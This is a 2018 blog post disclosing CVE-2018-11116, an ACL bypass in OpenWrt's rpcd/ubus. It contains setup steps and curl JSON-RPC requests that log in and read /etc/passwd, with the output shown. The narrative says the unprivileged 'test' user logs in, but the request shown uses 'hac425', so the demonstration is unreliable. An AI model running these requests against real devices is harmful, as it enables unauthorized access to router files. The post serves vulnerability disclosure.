【CVE-2018-11116】openwrt rpcd 配置文件错误导致访问控制失效

Author Avatar
hac425 5月 16, 2018
  • 在其它设备中阅读本文章

User can access to ubus over HTTP. This way depend on rpcd service. When misconfigure the rpcd’s ACL , It could lead the ACL don’t work.

Steps to produce the problem

First you should get an machine running openwrt And install uhttpd and luci to provide http service

1
2
opkg update
opkg install luci

Then to install some tools to add users in openwrt。

1
2
3
opkg install shadow-common
opkg install shadow-useradd
opkg install rpcd-mod-file

And then I add 2 user and make them can login in rpcd by modiy the rpcd config file.

1
2
3
4
5
6
7
8
9
10
11
12
root@OpenWrt:~# cat /etc/config/rpcd 
config login
    option username 'hac425'
    option password '$p$hac425'
    list read '*'
    list write '*'
config login
        option username 'test'
        option password '$p$test'
        list read '*'
        list write '*'

Next I create an config file for provide ACL to user who’s username is hac425 (the config file come from wiki for openwrt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@OpenWrt:/usr/share/rpcd/acl.d# cat hac425.json 
{
        "hac425": {
                "description": "acl for hac425",
                "read": {
                        "ubus": {
                                "file": [ "*" ],
                                "log": [ "*" ],
                                "service": [ "*" ],
                        },
                },
                "write": {
                        "ubus": {
                                "file": [ "*" ],
                                "log": [ "*" ],
                                "service": [ "*" ],
                        },
                }
        }
}
root@OpenWrt:/usr/share/rpcd/acl.d#

This let hac425 can call all methods in file namespace ( “file”: [ “*” ] )

I didn’t create the acl file for user who’s name is test, It mean that test user can only call the methods defined in unauthenticated.json.

However , when I test it , I found that the user test can also call the methods which is only allowed to hac425 user.
For example, The test user can call read method in file namespace which is not permited to him.

Next I would show it to you.
First I use test user’s username and password to login , and get the ubus_rpc_session (this value should be used to call other method defined in Acl config files)

1
2
3
06:28 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "00000000000000000000000000000000", "session", "login", { "username": "hac425", "password": "123"  } ] }'  http://192.168.31.111/ubus
{"jsonrpc":"2.0","id":1,"result":[0,{"ubus_rpc_session":"ba431d9f9791b7021389a03906c70fbf","timeout":300,"expires":300,"acls":{"access-group":{"hac425":["read","write"],"uci-access":["read","write"],"unauthenticated":["read"]},"ubus":{"file":["*"],"log":["*"],"service":["*"],"session":["access","login"]},"uci":{"*":["read","write"]}},"data":{"username":"hac425"}}]}

Then use the ubus_rpc_session to call read method in file namespace to read the content of /etc/passwd 

1
2
06:30 haclh@ubuntu:tmp $ curl -d '{ "jsonrpc": "2.0", "id": 1, "method": "call", "params": [ "ba431d9f9791b7021389a03906c70fbf", "file", "read", { "path": "/etc/passwd" } ] }'  http://192.168.31.111/ubus
{"jsonrpc":"2.0","id":1,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nhac425:x:1000:1000::\/home\/hac425:\ntest:x:1001:1001::\/home\/test:\n"}]}

Then we could get the file content.

This means that I can use test user to call read method which is not permited to test user.
Bypass the acl.

Conclusion

The vulneratility may lead the rpcd acl don’t work successful.
This lead the evil user can call the method which is only permited call by otherone user.

本站文章均原创, 转载注明来源
本文链接:http://blog.hac425.top/2018/05/16/openwrt_rpcd_acl_fail.html